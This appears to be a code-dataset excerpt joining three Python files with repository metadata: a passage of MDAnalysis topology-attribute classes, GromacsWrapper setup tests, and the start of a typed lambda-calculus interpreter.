"""Asphericity.
See [Dima2004b]_ for background information.
Parameters
----------
wrap : bool, optional
If ``True``, move all atoms within the primary unit cell before
calculation. [``False``]
unwrap : bool, optional
If ``True``, compounds will be unwrapped before computing their centers.
compound : {'group', 'segments', 'residues', 'molecules', 'fragments'}, optional
Which type of component to keep together during unwrapping.
.. versionadded:: 0.7.7
.. versionchanged:: 0.8
Added `pbc` keyword
.. versionchanged:: 0.20.0
Added *unwrap* and *compound* parameter
.. versionchanged:: 2.1.0
Renamed `pbc` kwarg to `wrap`. `pbc` is still accepted but
is deprecated and will be removed in version 3.0.
"""
atomgroup = group.atoms
masses = atomgroup.masses
com = atomgroup.center_of_mass(
wrap=wrap, unwrap=unwrap, compound=compound)
if compound != 'group':
com = (com * group.masses[:, None]
).sum(axis=0) / group.masses.sum()
if wrap:
recenteredpos = (atomgroup.pack_into_box(inplace=False) - com)
elif unwrap:
recenteredpos = (atomgroup.unwrap(inplace=False) - com)
else:
recenteredpos = (atomgroup.positions - com)
tensor = np.zeros((3, 3))
for x in range(recenteredpos.shape[0]):
tensor += masses[x] * np.outer(recenteredpos[x],
recenteredpos[x])
tensor /= atomgroup.total_mass()
eig_vals = np.linalg.eigvalsh(tensor)
shape = (3.0 / 2.0) * (np.sum((eig_vals - np.mean(eig_vals))**2) /
np.sum(eig_vals)**2)
return shape
transplants[GroupBase].append(
('asphericity', asphericity))
@warn_if_not_unique
@_pbc_to_wrap
def principal_axes(group, wrap=False):
"""Calculate the principal axes from the moment of inertia.
e1,e2,e3 = AtomGroup.principal_axes()
The eigenvectors are sorted by eigenvalue, i.e. the first one
corresponds to the highest eigenvalue and is thus the first principal
axes.
The eigenvectors form a right-handed coordinate system.
Parameters
----------
wrap : bool, optional
If ``True``, move all atoms within the primary unit cell before
calculation. [``False``]
Returns
-------
axis_vectors : array
3 x 3 array with ``v[0]`` as first, ``v[1]`` as second, and
``v[2]`` as third eigenvector.
.. versionchanged:: 0.8
Added `pbc` keyword
.. versionchanged:: 1.0.0
Always return principal axes in right-hand convention.
.. versionchanged:: 2.1.0
Renamed `pbc` kwarg to `wrap`. `pbc` is still accepted but
is deprecated and will be removed in version 3.0.
"""
atomgroup = group.atoms
e_val, e_vec = np.linalg.eig(atomgroup.moment_of_inertia(wrap=wrap))
# Sort
indices = np.argsort(e_val)[::-1]
# Make transposed in more logical form. See Issue 33.
e_vec = e_vec[:, indices].T
# Make sure the right hand convention is followed
if np.dot(np.cross(e_vec[0], e_vec[1]), e_vec[2]) < 0:
e_vec *= -1
return e_vec
transplants[GroupBase].append(
('principal_axes', principal_axes))
def align_principal_axis(group, axis, vector):
"""Align principal axis with index `axis` with `vector`.
Parameters
----------
axis : {0, 1, 2}
Index of the principal axis (0, 1, or 2), as produced by
:meth:`~principal_axes`.
vector : array_like
Vector to align principal axis with.
Notes
-----
To align the long axis of a channel (the first principal axis, i.e.
*axis* = 0) with the z-axis::
u.atoms.align_principal_axis(0, [0,0,1])
u.atoms.write("aligned.pdb")
"""
p = group.principal_axes()[axis]
angle = np.degrees(mdamath.angle(p, vector))
ax = transformations.rotaxis(p, vector)
# print "principal[%d] = %r" % (axis, p)
# print "axis = %r, angle = %f deg" % (ax, angle)
return group.rotateby(angle, ax)
transplants[GroupBase].append(
('align_principal_axis', align_principal_axis))
# TODO: update docs to property doc
class Charges(AtomAttr):
attrname = 'charges'
singular = 'charge'
per_object = 'atom'
target_classes = [AtomGroup, ResidueGroup, SegmentGroup,
Atom, Residue, Segment]
transplants = defaultdict(list)
dtype = float
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na)
def get_residues(self, rg):
resatoms = self.top.tt.residues2atoms_2d(rg.ix)
if isinstance(rg._ix, numbers.Integral):
charges = self.values[tuple(resatoms)].sum()
else:
charges = np.empty(len(rg))
for i, row in enumerate(resatoms):
charges[i] = self.values[row].sum()
return charges
def get_segments(self, sg):
segatoms = self.top.tt.segments2atoms_2d(sg.ix)
if isinstance(sg._ix, numbers.Integral):
# for a single segment
charges = self.values[tuple(segatoms)].sum()
else:
# for a segmentgroup
charges = np.array([self.values[row].sum() for row in segatoms])
return charges
@warn_if_not_unique
def total_charge(group, compound='group'):
r"""Total charge of (compounds of) the group.
Computes the total charge of :class:`Atoms<Atom>` in the group.
Total charges per :class:`Residue`, :class:`Segment`, molecule, or
fragment can be obtained by setting the `compound` parameter
accordingly.
Parameters
----------
compound : {'group', 'segments', 'residues', 'molecules', 'fragments'},\
optional
If 'group', the total charge of all atoms in the group will
be returned as a single value. Otherwise, the total charges per
:class:`Segment`, :class:`Residue`, molecule, or fragment
will be returned as a 1d array.
Note that, in any case, *only* the charges of :class:`Atoms<Atom>`
*belonging to the group* will be taken into account.
Returns
-------
float or numpy.ndarray
Total charge of (compounds of) the group.
If `compound` was set to ``'group'``, the output will be a single
value. Otherwise, the output will be a 1d array of shape ``(n,)``
where ``n`` is the number of compounds.
.. versionchanged:: 0.20.0 Added `compound` parameter
"""
return group.accumulate("charges", compound=compound)
transplants[GroupBase].append(
('total_charge', total_charge))
# TODO: update docs to property doc
class Occupancies(AtomAttr):
attrname = 'occupancies'
singular = 'occupancy'
per_object = 'atom'
dtype = float
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na)
# TODO: update docs to property doc
class AltLocs(AtomStringAttr):
"""AltLocs for each atom"""
attrname = 'altLocs'
singular = 'altLoc'
per_object = 'atom'
dtype = object
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.array(['' for _ in range(na)], dtype=object)
class GBScreens(AtomAttr):
"""Generalized Born screening factor"""
attrname = 'gbscreens'
singular = 'gbscreen'
per_object = 'atom'
dtype = float
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na)
class SolventRadii(AtomAttr):
"""Intrinsic solvation radius"""
attrname = 'solventradii'
singular = 'solventradius'
per_object = 'atom'
dtype = float
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na)
class NonbondedIndices(AtomAttr):
"""Nonbonded index (AMBER)"""
attrname = 'nbindices'
singular = 'nbindex'
per_object = 'atom'
dtype = int
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na, dtype=np.int32)
class RMins(AtomAttr):
"""The Rmin/2 LJ parameter"""
attrname = 'rmins'
singular = 'rmin'
per_object = 'atom'
dtype = float
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na)
class Epsilons(AtomAttr):
"""The epsilon LJ parameter"""
attrname = 'epsilons'
singular = 'epsilon'
per_object = 'atom'
dtype = float
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na)
class RMin14s(AtomAttr):
"""The Rmin/2 LJ parameter for 1-4 interactions"""
attrname = 'rmin14s'
singular = 'rmin14'
per_object = 'atom'
dtype = float
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na)
class Epsilon14s(AtomAttr):
"""The epsilon LJ parameter for 1-4 interactions"""
attrname = 'epsilon14s'
singular = 'epsilon14'
per_object = 'atom'
dtype = float
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na)
class Aromaticities(AtomAttr):
"""Aromaticity"""
attrname = "aromaticities"
singular = "aromaticity"
per_object = "atom"
dtype = bool
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.zeros(na, dtype=bool)
class RSChirality(AtomAttr):
"""R/S chirality"""
attrname = 'chiralities'
singular= 'chirality'
dtype = 'U1'
class ResidueAttr(TopologyAttr):
attrname = 'residueattrs'
singular = 'residueattr'
target_classes = [AtomGroup, ResidueGroup, SegmentGroup, Atom, Residue]
per_object = 'residue'
def get_atoms(self, ag):
rix = self.top.tt.atoms2residues(ag.ix)
return self.values[rix]
def set_atoms(self, ag, values):
raise _wronglevel_error(self, ag)
def get_residues(self, rg):
return self.values[rg.ix]
@_check_length
def set_residues(self, rg, values):
self.values[rg.ix] = values
def get_segments(self, sg):
"""By default, the values for each residue present in the set of
segments are returned in a single array. This behavior can be overriden
in child attributes.
"""
rixs = self.top.tt.segments2residues_2d(sg.ix)
return [self.values[rix] for rix in rixs]
def set_segments(self, sg, values):
raise _wronglevel_error(self, sg)
# woe betide anyone who switches this inheritance order
# Mixin needs to be first (L to R) to get correct __init__ and set_atoms
class ResidueStringAttr(_StringInternerMixin, ResidueAttr):
@_check_length
def set_residues(self, ag, values):
return self._set_X(ag, values)
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.full(nr, '', dtype=object)
# TODO: update docs to property doc
class Resids(ResidueAttr):
"""Residue ID"""
attrname = 'resids'
singular = 'resid'
dtype = int
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.arange(1, nr + 1)
# TODO: update docs to property doc
class Resnames(ResidueStringAttr):
attrname = 'resnames'
singular = 'resname'
transplants = defaultdict(list)
dtype = object
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.array(['' for _ in range(nr)], dtype=object)
def sequence(self, **kwargs):
"""Returns the amino acid sequence.
The format of the sequence is selected with the keyword *format*:
============== ============================================
*format* description
============== ============================================
'SeqRecord' :class:`Bio.SeqRecord.SeqRecord` (default)
'Seq' :class:`Bio.Seq.Seq`
'string' string
============== ============================================
The sequence is returned by default (keyword ``format = 'SeqRecord'``)
as a :class:`Bio.SeqRecord.SeqRecord` instance, which can then be
further processed. In this case, all keyword arguments (such as the
*id* string or the *name* or the *description*) are directly passed to
:class:`Bio.SeqRecord.SeqRecord`.
If the keyword *format* is set to ``'Seq'``, all *kwargs* are ignored
and a :class:`Bio.Seq.Seq` instance is returned. The difference to the
record is that the record also contains metadata and can be directly
used as an input for other functions in :mod:`Bio`.
If the keyword *format* is set to ``'string'``, all *kwargs* are
ignored and a Python string is returned.
.. rubric:: Example: Write FASTA file
Use :func:`Bio.SeqIO.write`, which takes sequence records::
import Bio.SeqIO
# get the sequence record of a protein component of a Universe
protein = u.select_atoms("protein")
record = protein.sequence(id="myseq1", name="myprotein")
Bio.SeqIO.write(record, "single.fasta", "fasta")
A FASTA file with multiple entries can be written with ::
Bio.SeqIO.write([record1, record2, ...], "multi.fasta", "fasta")
Parameters
----------
format : string, optional
- ``"string"``: return sequence as a string of 1-letter codes
- ``"Seq"``: return a :class:`Bio.Seq.Seq` instance
- ``"SeqRecord"``: return a :class:`Bio.SeqRecord.SeqRecord`
instance
Default is ``"SeqRecord"``
id : optional
Sequence ID for SeqRecord (should be different for different
sequences)
name : optional
Name of the protein.
description : optional
Short description of the sequence.
kwargs : optional
Any other keyword arguments that are understood by
class:`Bio.SeqRecord.SeqRecord`.
Raises
------
:exc:`ValueError` if a residue name cannot be converted to a
1-letter IUPAC protein amino acid code; make sure to only
select protein residues.
:exc:`TypeError` if an unknown *format* is selected.
.. versionadded:: 0.9.0
"""
formats = ('string', 'Seq', 'SeqRecord')
format = kwargs.pop("format", "SeqRecord")
if format not in formats:
raise TypeError("Unknown format='{0}': must be one of: {1}".format(
format, ", ".join(formats)))
try:
sequence = "".join([convert_aa_code(r)
for r in self.residues.resnames])
except KeyError as err:
errmsg = (f"AtomGroup contains a residue name '{err.message}' that"
f" does not have a IUPAC protein 1-letter character")
raise ValueError(errmsg) from None
if format == "string":
return sequence
seq = Bio.Seq.Seq(sequence)
if format == "Seq":
return seq
return Bio.SeqRecord.SeqRecord(seq, **kwargs)
transplants[ResidueGroup].append(
('sequence', sequence))
# TODO: update docs to property doc
class Resnums(ResidueAttr):
attrname = 'resnums'
singular = 'resnum'
dtype = int
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.arange(1, nr + 1)
class ICodes(ResidueStringAttr):
"""Insertion code for Atoms"""
attrname = 'icodes'
singular = 'icode'
dtype = object
class Moltypes(ResidueStringAttr):
"""Name of the molecule type
Two molecules that share a molecule type share a common template topology.
"""
attrname = 'moltypes'
singular = 'moltype'
dtype = object
class Molnums(ResidueAttr):
"""Index of molecule from 0
"""
attrname = 'molnums'
singular = 'molnum'
dtype = np.intp
# segment attributes
class SegmentAttr(TopologyAttr):
"""Base class for segment attributes.
"""
attrname = 'segmentattrs'
singular = 'segmentattr'
target_classes = [AtomGroup, ResidueGroup,
SegmentGroup, Atom, Residue, Segment]
per_object = 'segment'
def get_atoms(self, ag):
six = self.top.tt.atoms2segments(ag.ix)
return self.values[six]
def set_atoms(self, ag, values):
raise _wronglevel_error(self, ag)
def get_residues(self, rg):
six = self.top.tt.residues2segments(rg.ix)
return self.values[six]
def set_residues(self, rg, values):
raise _wronglevel_error(self, rg)
def get_segments(self, sg):
return self.values[sg.ix]
@_check_length
def set_segments(self, sg, values):
self.values[sg.ix] = values
# woe betide anyone who switches this inheritance order
# Mixin needs to be first (L to R) to get correct __init__ and set_atoms
class SegmentStringAttr(_StringInternerMixin, SegmentAttr):
@_check_length
def set_segments(self, ag, values):
return self._set_X(ag, values)
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.full(ns, '', dtype=object)
# TODO: update docs to property doc
class Segids(SegmentStringAttr):
attrname = 'segids'
singular = 'segid'
transplants = defaultdict(list)
dtype = object
@staticmethod
def _gen_initial_values(na, nr, ns):
return np.array(['' for _ in range(ns)], dtype=object)
def _check_connection_values(func):
"""
Checks values passed to _Connection methods for:
- appropriate number of atom indices
- coerces them to tuples of ints (for hashing)
- ensures that first value is less than last (reversibility & hashing)
.. versionadded:: 1.0.0
"""
@functools.wraps(func)
def wrapper(self, values, *args, **kwargs):
if not all(len(x) == self._n_atoms
and all(isinstance(y, (int, np.integer)) for y in x)
for x in values):
raise ValueError(("{} must be an iterable of tuples with {}"
" atom indices").format(self.attrname,
self._n_atoms))
clean = []
for v in values:
if v[0] > v[-1]:
v = v[::-1]
clean.append(tuple(v))
return func(self, clean, *args, **kwargs)
return wrapper
class _ConnectionTopologyAttrMeta(_TopologyAttrMeta):
"""
Specific metaclass for atom-connectivity topology attributes.
This class adds an ``intra_{attrname}`` property to groups
to return only the connections within the atoms in the group.
"""
def __init__(cls, name, bases, classdict):
super().__init__(name, bases, classdict)
attrname = classdict.get('attrname')
if attrname is not None:
def intra_connection(self, ag):
"""Get connections only within this AtomGroup
"""
return ag.get_connections(attrname, outside=False)
method = MethodType(intra_connection, cls)
prop = property(method, None, None, method.__doc__)
cls.transplants[AtomGroup].append((f"intra_{attrname}", prop))
class _Connection(AtomAttr, metaclass=_ConnectionTopologyAttrMeta):
"""Base class for connectivity between atoms
.. versionchanged:: 1.0.0
Added type checking to atom index values.
"""
@_check_connection_values
def __init__(self, values, types=None, guessed=False, order=None):
self.values = values
if types is None:
types = [None] * len(values)
self.types = types
if guessed in (True, False):
# if single value passed, multiply this across
# all bonds
guessed = [guessed] * len(values)
self._guessed = guessed
if order is None:
order = [None] * len(values)
self.order = order
self._cache = dict()
def copy(self):
"""Return a deepcopy of this attribute"""
return self.__class__(copy.copy(self.values),
copy.copy(self.types),
copy.copy(self._guessed),
copy.copy(self.order))
def __len__(self):
return len(self._bondDict)
@property
@cached('bd')
def _bondDict(self):
"""Lazily built mapping of atoms:bonds"""
bd = defaultdict(list)
for b, t, g, o in zip(self.values, self.types,
self._guessed, self.order):
for a in b:
bd[a].append((b, t, g, o))
return bd
def set_atoms(self, ag):
return NotImplementedError("Cannot set bond information")
def get_atoms(self, ag):
"""
Get connection values where the atom indices are in
the given atomgroup.
Parameters
----------
ag : AtomGroup
"""
try:
unique_bonds = set(itertools.chain(
*[self._bondDict[a] for a in ag.ix]))
except TypeError:
# maybe we got passed an Atom
unique_bonds = self._bondDict[ag.ix]
unique_bonds = np.array(sorted(unique_bonds), dtype=object)
bond_idx, types, guessed, order = np.hsplit(unique_bonds, 4)
bond_idx = np.array(bond_idx.ravel().tolist(), dtype=np.int32)
types = types.ravel()
guessed = guessed.ravel()
order = order.ravel()
return TopologyGroup(bond_idx, ag.universe,
self.singular[:-1],
types,
guessed,
order)
@_check_connection_values
def _add_bonds(self, values, types=None, guessed=True, order=None):
if types is None:
types = itertools.cycle((None,))
if guessed in (True, False):
guessed = itertools.cycle((guessed,))
if order is None:
order = itertools.cycle((None,))
existing = set(self.values)
for v, t, g, o in zip(values, types, guessed, order):
if v not in existing:
self.values.append(v)
self.types.append(t)
self._guessed.append(g)
self.order.append(o)
# kill the old cache of bond Dict
try:
del self._cache['bd']
except KeyError:
pass
@_check_connection_values
def _delete_bonds(self, values):
"""
.. versionadded:: 1.0.0
"""
to_check = set(values)
self_values = set(self.values)
if not to_check.issubset(self_values):
missing = to_check-self_values
indices = ', '.join(map(str, missing))
raise ValueError(('Cannot delete nonexistent '
'{attrname} with atom indices:'
'{indices}').format(attrname=self.attrname,
indices=indices))
idx = [self.values.index(v) for v in to_check]
for i in sorted(idx, reverse=True):
del self.values[i]
for attr in ('types', '_guessed', 'order'):
arr = np.array(getattr(self, attr), dtype='object')
new = np.delete(arr, idx)
setattr(self, attr, list(new))
# kill the old cache of bond Dict
try:
del self._cache['bd']
except KeyError:
pass
class Bonds(_Connection):
"""Bonds between two atoms
Must be initialised by a list of zero based tuples.
These indices refer to the atom indices.
E.g., ` [(0, 1), (1, 2), (2, 3)]`
Also adds the `bonded_atoms`, `fragment` and `fragments`
attributes.
"""
attrname = 'bonds'
# Singular is the same because one Atom might have
# many bonds, so still asks for "bonds" in the plural
singular = 'bonds'
transplants = defaultdict(list)
_n_atoms = 2
def bonded_atoms(self):
"""An :class:`~MDAnalysis.core.groups.AtomGroup` of all
:class:`Atoms<MDAnalysis.core.groups.Atom>` bonded to this
:class:`~MDAnalysis.core.groups.Atom`."""
idx = [b.partner(self).index for b in self.bonds]
return self.universe.atoms[idx]
transplants[Atom].append(
('bonded_atoms', property(bonded_atoms, None, None,
bonded_atoms.__doc__)))
def fragindex(self):
"""The index (ID) of the
:class:`~MDAnalysis.core.topologyattrs.Bonds.fragment` this
:class:`~MDAnalysis.core.groups.Atom` is part of.
.. versionadded:: 0.20.0
"""
return self.universe._fragdict[self.ix].ix
@cached('fragindices', universe_validation=True)
def fragindices(self):
r"""The
:class:`fragment indices<MDAnalysis.core.topologyattrs.Bonds.fragindex>`
of all :class:`Atoms<MDAnalysis.core.groups.Atom>` in this
:class:`~MDAnalysis.core.groups.AtomGroup`.
A :class:`numpy.ndarray` with
:attr:`~numpy.ndarray.shape`\ ``=(``\ :attr:`~AtomGroup.n_atoms`\ ``,)``
and :attr:`~numpy.ndarray.dtype`\ ``=numpy.int64``.
.. versionadded:: 0.20.0
"""
fragdict = self.universe._fragdict
return np.array([fragdict[aix].ix for aix in self.ix], dtype=np.intp)
def fragment(self):
"""An :class:`~MDAnalysis.core.groups.AtomGroup` representing the
fragment this :class:`~MDAnalysis.core.groups.Atom` is part of.
A fragment is a
:class:`group of atoms<MDAnalysis.core.groups.AtomGroup>` which are
interconnected by :class:`~MDAnalysis.core.topologyattrs.Bonds`, i.e.,
there exists a path along one
or more :class:`~MDAnalysis.core.topologyattrs.Bonds` between any pair
of :class:`Atoms<MDAnalysis.core.groups.Atom>`
within a fragment. Thus, a fragment typically corresponds to a molecule.
.. versionadded:: 0.9.0
"""
return self.universe._fragdict[self.ix].fragment
@cached('fragments', universe_validation=True)
def fragments(self):
"""Read-only :class:`tuple` of
:class:`fragments<MDAnalysis.core.topologyattrs.Bonds.fragment>`.
Contains all fragments that
any :class:`~MDAnalysis.core.groups.Atom` in this
:class:`~MDAnalysis.core.groups.AtomGroup` is part of.
A fragment is a
:class:`group of atoms<MDAnalysis.core.groups.AtomGroup>` which are
interconnected by :class:`~MDAnalysis.core.topologyattrs.Bonds`, i.e.,
there exists a path along one
or more :class:`~MDAnalysis.core.topologyattrs.Bonds` between any pair
of :class:`Atoms<MDAnalysis.core.groups.Atom>`
within a fragment. Thus, a fragment typically corresponds to a molecule.
Note
----
* The contents of the fragments may extend beyond the contents of this
:class:`~MDAnalysis.core.groups.AtomGroup`.
.. versionadded:: 0.9.0
"""
fragdict = self.universe._fragdict
return tuple(sorted(set(fragdict[aix].fragment for aix in self.ix),
key=lambda x: x[0].ix))
def n_fragments(self):
"""The number of unique
:class:`~MDAnalysis.core.topologyattrs.Bonds.fragments` the
:class:`Atoms<MDAnalysis.core.groups.Atom>` of this
:class:`~MDAnalysis.core.groups.AtomGroup` are part of.
.. versionadded:: 0.20.0
"""
return len(unique_int_1d(self.fragindices))
transplants[Atom].append(
('fragment', property(fragment, None, None,
fragment.__doc__)))
transplants[Atom].append(
('fragindex', property(fragindex, None, None,
fragindex.__doc__)))
transplants[AtomGroup].append(
('fragments', property(fragments, None, None,
fragments.__doc__)))
transplants[AtomGroup].append(
('fragindices', property(fragindices, None, None,
fragindices.__doc__)))
transplants[AtomGroup].append(
('n_fragments', property(n_fragments, None, None,
n_fragments.__doc__)))
class UreyBradleys(_Connection):
"""Angles between two atoms
Initialise with a list of 2 long tuples
These indices refer to the atom indices.
.. versionadded:: 1.0.0
"""
attrname = 'ureybradleys'
singular = 'ureybradleys'
transplants = defaultdict(list)
_n_atoms = 2
class Angles(_Connection):
"""Angles between three atoms
Initialise with a list of 3 long tuples
E.g., `[(0, 1, 2), (1, 2, 3), (2, 3, 4)]`
These indices refer to the atom indices.
"""
attrname = 'angles'
singular = 'angles'
transplants = defaultdict(list)
_n_atoms = 3
class Dihedrals(_Connection):
"""A connection between four sequential atoms"""
attrname = 'dihedrals'
singular = 'dihedrals'
transplants = defaultdict(list)
_n_atoms = 4
class Impropers(_Connection):
"""An imaginary dihedral between four atoms"""
attrname = 'impropers'
singular = 'impropers'
transplants = defaultdict(list)
_n_atoms = 4
class CMaps(_Connection):
"""
A connection between five atoms
.. versionadded:: 1.0.0
"""
attrname = 'cmaps'
singular = 'cmaps'
transplants = defaultdict(list)
_n_atoms = 5
|
MDAnalysis/mdanalysis
|
package/MDAnalysis/core/topologyattrs.py
|
Python
|
gpl-2.0
| 90,931
|
[
"Amber",
"MDAnalysis"
] |
ba50a17f11acd5da5bfdf798e190087a9cc230dd8932940f68f08ce8e8828f73
|
# GromacsWrapper: test_example.py
# Copyright (c) 2009 Oliver Beckstein <orbeckst@gmail.com>
# Released under the GNU Public License 3 (or higher, your choice)
# See the file COPYING for details.
from __future__ import division, absolute_import, print_function
import os.path
import pytest
from numpy.testing import assert_almost_equal
import gromacs
import gromacs.setup
from .datafiles import datafile
@pytest.mark.xfail(gromacs.release.startswith("2020.6"),
reason="pdb2gmx 2020.6 fails to build the TIP4P waters")
def test_trj_compact_main(tmpdir):
pdb = datafile("1ake_A.pdb")
top = tmpdir.mkdir("top")
mdpfile = "simple.mdp"
tprfile = "simple.tpr"
outfile = "compact.pdb"
with top.as_cwd():
f = gromacs.setup.topology(struct=pdb, ff="oplsaa", water="tip4p")
with open(mdpfile, 'w') as mdp:
mdp.write('; empty mdp file\nrcoulomb = 1\nrvdw = 1\nrlist = 1\n')
gromacs.grompp(f=mdpfile, o=tprfile, c=f["struct"], p=f["top"])
gromacs.setup.trj_compact_main(s=tprfile, f=f["struct"], o=outfile,
input=("protein", "system"))
assert os.path.exists(outfile)
@pytest.fixture(scope="session")
def topology(tmpdir_factory, struct=datafile("1ake_A_protein.pdb")):
# note: use protein-only input 1ake_A_protein.pdb because solvation fails
# if crystal waters are included (in 1ake_A.pdb)
TMPDIR = tmpdir_factory.mktemp('1ake')
with TMPDIR.as_cwd():
topol_args = gromacs.setup.topology(struct=struct, ff="oplsaa", water="tip4p")
return TMPDIR, topol_args
@pytest.fixture(scope="session")
def solvate(topology):
TMPDIR, topol_args = topology
with TMPDIR.as_cwd():
solvate_args = gromacs.setup.solvate(concentration=0.15,
water="tip4p",
**topol_args)
return TMPDIR, solvate_args
@pytest.fixture(scope="session")
def energy_minimize(solvate, low_performance):
# run short energy minimization with cheapest minimizer
TMPDIR, solvate_args = solvate
nt = 2 if low_performance else 0
with TMPDIR.as_cwd():
em_args = gromacs.setup.energy_minimize(mdrun_args={'nt': nt},
integrator="steep",
emtol=5000,
maxwarn=1,
**solvate_args)
return TMPDIR, em_args
def test_topology(topology):
TMPDIR, topol_args = topology
top = topol_args['top']
struct = topol_args['struct']
posres = topol_args['posres']
assert os.path.exists(top)
assert os.path.exists(struct)
assert os.path.exists(posres)
# add more tests for content of files!
def test_solvate(solvate):
TMPDIR, solvate_args = solvate
assert_almost_equal(solvate_args['qtot'], 0.0)
assert os.path.exists(solvate_args['struct'])
assert os.path.exists(solvate_args['ndx'])
assert solvate_args['mainselection'] == '"Protein"'
# add more tests for content of files!
def test_energy_minimize(energy_minimize):
TMPDIR, em_args = energy_minimize
assert os.path.exists(em_args['struct'])
assert os.path.exists(em_args['top'])
assert em_args['mainselection'] == '"Protein"'
# add more tests for content of files!
def test_energy_minimize_custom_mdp(solvate, low_performance,
mdp=datafile("custom_em.mdp")):
TMPDIR, solvate_args = solvate
nt = 2 if low_performance else 0
with TMPDIR.as_cwd():
try:
em_args = gromacs.setup.energy_minimize(mdrun_args={'nt': nt},
mdp=mdp,
emtol=5000,
**solvate_args)
except gromacs.exceptions.GromacsError as err:
# sometimes the em does not converge at all, e.g. 5.02988e+04 on atom 3277;
# (happens on Travis Linux with Gromacs 4.6.5 but not locally or on Travis OSX) so we
# re-run with a ridiculous tolerance so that we can at least test that the whole
# function can run to completion
em_args = gromacs.setup.energy_minimize(mdrun_args={'nt': nt},
mdp=mdp,
emtol=6e4,
**solvate_args)
assert os.path.exists(em_args['struct'])
assert os.path.exists(em_args['top'])
assert em_args['mainselection'] == '"Protein"'
# add more tests for content of files!
|
Becksteinlab/GromacsWrapper
|
tests/test_setup.py
|
Python
|
gpl-3.0
| 4,756
|
[
"CRYSTAL",
"Gromacs"
] |
f1976cebd74c225a5d32c4b322cc12372fdad94992a8409f0eb574e4d424600d
|
from collections import namedtuple
# ----------------------------------------------------------------------
# Datatypes
# Types
TyTop = namedtuple("TyTop", [])
TyBot = namedtuple("TyBot", [])
TyRecord = namedtuple("TyRecord", ["fields"])
TyArr = namedtuple("TyArr", ["left", "right"])
# Terms
TmVar = namedtuple("TmVar", ["info", "index", "ctxlength"])
TmAbs = namedtuple("TmAbs", ["info", "name", "type", "term"])
TmApp = namedtuple("TmApp", ["info", "left", "right"])
TmRecord = namedtuple("TmRecord", ["info", "fields"])
TmProj = namedtuple("TmProj", ["info", "term", "name"])
# Bindings
NameBind = namedtuple("NameBind", [])
VarBind = namedtuple("VarBind", ["type"])
# Commands
Bind = namedtuple("Bind", ["info", "name", "binding"])
Eval = namedtuple("Eval", ["info", "term"])
# ----------------------------------------------------------------------
# Context management
def addbinding(ctx, name, bind):
ctx.append((name, bind))
return ctx
def addname(ctx, name):
return addbinding(ctx, name, NameBind())
def isnamebound(ctx, name):
for ctx_name, _ in ctx:
if ctx_name == name:
return True
return False
def pickfreshname(ctx, name):
new_name = str(name)
while isnamebound(ctx, new_name):
new_name += "'"
return ctx + [(new_name, NameBind())], new_name
def get_ctx_item(ctx, index):
try:
return ctx[len(ctx) - index - 1]
except IndexError:
raise RuntimeError(
"Variable lookup failure: offset: %d, ctx size: %d" %
(index, len(ctx)))
def index2name(ctx, index):
(name, _) = get_ctx_item(ctx, index)
return name
def name2index(ctx, name):
for index, (v, _) in enumerate(reversed(ctx)):
if name == v:
return index
raise ValueError("Identifier %s is unbound" % name)
# ----------------------------------------------------------------------
# Shifting
def tmmap(onvar, c, t):
def walk(c, t):
ty_t = type(t)
if ty_t is TmVar:
return onvar(t.info, c, t.index, t.ctxlength)
elif ty_t is TmAbs:
return TmAbs(t.info, t.name, t.type, walk((c+1), t.term))
elif ty_t is TmApp:
return TmApp(t.info, walk(c, t.left), walk(c, t.right))
elif ty_t is TmProj:
return TmProj(t.info, walk(c, t.term), t.name)
elif ty_t is TmRecord:
fields = [(li, walk(c, ti)) for li, ti in t.fields]
return TmRecord(t.info, fields)
return walk(c, t)
def termShiftAbove(d, c, t):
return tmmap(
lambda info, c, x, n: TmVar(info, x+d, n+d) if x >= c else TmVar(info, x, n+d),
c, t
)
def termShift(d, t):
return termShiftAbove(d, 0, t)
# ----------------------------------------------------------------------
# Substitution
def termSubst(j, s, t):
return tmmap(
lambda info, c, x, n: termShift(c, s) if x == j+c else TmVar(info, x, n),
0, t
)
def termSubstTop(s, t):
return termShift(-1, termSubst(0, termShift(1, s), t))
# ----------------------------------------------------------------------
# Context management (continued)
def getbinding(ctx, index):
(_, binding) = get_ctx_item(ctx, index)
return binding
def getTypeFromContext(ctx, index):
binding = getbinding(ctx, index)
if isinstance(binding, VarBind):
return binding.type
else:
raise RuntimeError(
"Wrong kind of binding for variable %s" %
index2name(ctx, index))
raise
# ----------------------------------------------------------------------
# Printing
class Info(namedtuple("Info", ["filename", "lineno"])):
def __repr__(self):
return '<%s:%s>' % self
class Visitor:
@classmethod
def visit(cls, term, *args, **kwargs):
method_name = 'visit_' + type(term).__name__
method = getattr(cls, method_name, getattr(cls, 'visit__', None))
if method is None:
raise AttributeError(
"type object '%s' has no attribute '%s'" %
(cls.__name__, method_name))
return method(term, *args, **kwargs)
class TypesPrinter(Visitor):
def visit_TyArr(term):
printty(term.left)
print(" -> ", end="")
printty(term.right)
def visit_TyBool(term):
print("Bool", end="")
def visit_TyTop(term):
print("Top", end="")
def visit_TyBot(term):
print("Bot", end="")
printty = TypesPrinter.visit
class TermsPrinter(Visitor):
def visit_TmVar(self, ctx):
if len(ctx) == self.ctxlength:
print(index2name(ctx, self.index), end="")
else:
print(
"[bad index: " + str(self.index) + "/" + str(self.ctxlength)
+ " in {" + " ".join(map(str, ctx)) + " }]")
def visit_TmAbs(self, ctx):
(new_ctx, name) = pickfreshname(ctx, self.name)
print("(", end="")
print("lambda %s" % name, end="")
print(": ", end="")
printty(self.type)
print(" . ", end="")
printtm(self.term, new_ctx)
print(")", end="")
def visit_TmApp(self, ctx):
print("(", end="")
printtm(self.left, ctx)
print(" ", end="")
printtm(self.right, ctx)
print(")", end="")
